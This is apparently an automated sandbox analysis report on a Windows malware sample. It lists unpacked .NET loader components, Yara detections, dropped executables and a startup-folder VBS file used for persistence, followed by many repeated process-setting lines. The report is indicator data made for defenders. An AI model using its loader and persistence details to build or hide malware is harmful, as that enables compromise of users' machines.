Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.0000000004082000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2058549679.0000000007440000.00000004.08000000.00040000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2047839333.0000000003F8C000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ishon.exe, 00000007.00000002.2322238117.0000000004360000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb@RqN source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010F8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: Ref#2056119.exe, 00000000.00000002.2047839333.000000000416B000.00000004.00000800.00020000.00000000.sdmp, Ref#2056119.exe, 00000000.00000002.2055746024.0000000007280000.00000004.08000000.00040000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.0000000003705000.00000004.00000800.00020000.00000000.sdmp, Liphmahu.exe, 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\user\AppData\Local\Temp\Liphmahu.PDB source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP*n,C:\Windows\System.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbM source: Liphmahu.exe, 00000008.00000002.3111190217.0000000001148000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: Liphmahu.exe, 00000008.00000002.3111190217.00000000010E2000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ##.pdb source: Liphmahu.exe, 00000008.00000002.3110023238.0000000000D37000.00000004.00000010.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Ref#2056119.exe.4082520.5.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties
Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.Ref#2056119.exe.416b108.2.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeModel.cs	.Net Code: TryDeserializeList
Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, ListDecorator.cs	.Net Code: Read
Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeSerializer.cs	.Net Code: CreateInstance
Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateInstance
Source: 0.2.Ref#2056119.exe.7280000.8.raw.unpack, TypeSerializer.cs	.Net Code: EmitCreateIfNull
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, ReflectionHelper.cs	.Net Code: InvokeMethod
Source: 0.2.Ref#2056119.exe.4032500.4.raw.unpack, XmlSerializationHelper.cs	.Net Code: ReadObjectProperties

Yara detected Costura Assembly Loader

Source: Yara match	File source: 4.2.Liphmahu.exe.6890000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Liphmahu.exe.3630ad0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Ref#2056119.exe.71f0000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2031085237.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2192763422.00000000024F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2307141750.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2215628448.0000000006890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2055273808.00000000071F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2202830836.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ref#2056119.exe PID: 7496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Liphmahu.exe PID: 7852, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ishon.exe PID: 7236, type: MEMORYSTR

Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0133DA98 pushad ; ret	0_2_0133DA99
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_070F1913 push eax; ret	0_2_070F191D
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_070F1C88 push eax; retf	0_2_070F1E11
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_070F1C83 push eax; retf	0_2_070F1E11
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0714E65A push eax; retf	0_2_0714E661
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0714E9DC push esp; iretd	0_2_0714E9F1
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071584DF push edi; iretd	0_2_071584FF
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07153A12 push BA051AC2h; retf	0_2_07153A17
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0717C929 push BA051AC2h; ret	0_2_0717C92E
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_071781B9 pushad ; iretd	0_2_071781C5
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0743552D push FFFFFF8Bh; iretd	0_2_0743552F
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07435405 push FFFFFF8Bh; iretd	0_2_07435407
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074353EC push FFFFFF8Bh; ret	0_2_074353F0
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074353B1 push FFFFFF8Bh; ret	0_2_074353B6
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_07434AFA push 8BF08B6Ah; retf	0_2_07434AFF
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_0743E1E3 push 8BD08B6Bh; retf	0_2_0743E1E8
Source: C:\Users\user\Desktop\Ref#2056119.exe	Code function: 0_2_074B53A0 push eax; ret	0_2_074B53A1
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_0091E998 pushad ; retf	4_2_0091E9B6
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_0091DA98 pushad ; ret	4_2_0091DA99
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D25191 pushad ; ret	4_2_05D251F1
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D25198 pushad ; ret	4_2_05D251F1
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D21913 push eax; ret	4_2_05D2191D
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D4EDBA pushfd ; iretd	4_2_05D4EDC1
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D83DDD push BA04A3C2h; retf	4_2_05D83DE2
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8F571 push BA04A3C2h; retn 0001h	4_2_05D8F576
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D884BA push 3005D7CBh; iretd	4_2_05D884C5
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D87690 pushfd ; ret	4_2_05D87691
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D83EA3 push BA04A3C2h; retf	4_2_05D83EA8
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D8F679 push BA04A3C2h; retn 0001h	4_2_05D8F67E
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_05D83BB6 push BA04A3C2h; ret	4_2_05D83BBB
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Code function: 4_2_067C45B3 push ss; iretd	4_2_067C45B9

Source: C:\Users\user\Desktop\Ref#2056119.exe	File created: C:\Users\user\AppData\Roaming\ishon.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Ref#2056119.exe	File created: C:\Users\user\AppData\Local\Temp\Liphmahu.exe			Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\Desktop\Ref#2056119.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Jump to dropped file

Source: C:\Users\user\Desktop\Ref#2056119.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ishon.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Liphmahu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Ref#2056119.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
